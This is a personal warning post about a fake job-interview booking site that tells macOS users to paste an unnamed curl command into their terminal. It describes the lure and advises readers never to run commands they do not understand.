I ran into a strange hack this week. It looks simple at first, but it is not. It targets job seekers. I think I recall submitting a resume for a job at a company called Runeapes, which, at least on the surface, looks like a real website.
You get a message saying you missed an appointment. It points you to a booking page. The name looks normal, the flow looks normal. You click through, pick a time, go through the usual steps. Nothing stands out.
Then it asks you to get ready for the meeting.
There is a download for Windows, which is expected. Then there is a “download” for macOS. That is where things change. Instead of a file, you get a terminal command. A curl command. It tells you to paste it into your terminal. If you’re not technical, this step can inject so much malware into your system that you’ll probably be hacked for life.
That should stop you right there.
The command points to a domain that looks real at a glance but is not. The domain was created recently. Same with the app domain tied to the booking flow. Both showed up within the past month or so.
I started poking around. The site has all the usual pages: Pricing, About, Blog, Careers, Contact. Every single one is dead. Links go nowhere. Social links are junk. It is a full layout with no substance behind it.
I tried to pull the file without running it, just to see what it was doing. Even that failed. The endpoint is already gone. Whatever was there has been taken down or moved.
So what is the point?
The point is to get you to run a command you do not understand. If you paste that into your terminal and hit enter, you are giving it permission to do whatever it wants on your machine. Download code, run it, install something, pull data, anything.
Most people are not used to seeing terminal commands in a normal workflow, but the setup here is convincing enough that someone might go along with it. It looks like a meeting tool. It feels like onboarding. You are already halfway committed by the time you see the command.
That is the trick.
If you take one thing from this, it is simple: Do not paste random commands into your terminal. Ever. It does not matter how official the site looks or how normal the flow feels. If you do not know exactly what a command does, do not run it.
Also, we know that hackers are targeting the desperate. There are endless crypto scams out there, and this one targets job seekers who are already probably exhausted. Please be careful any time someone asks you to use anything outside of Zoom, Calendly, or Google Meet. Also, make sure you never, ever download weird apps to connect to any kind of video meeting.
This one is already dead, but there will be more.
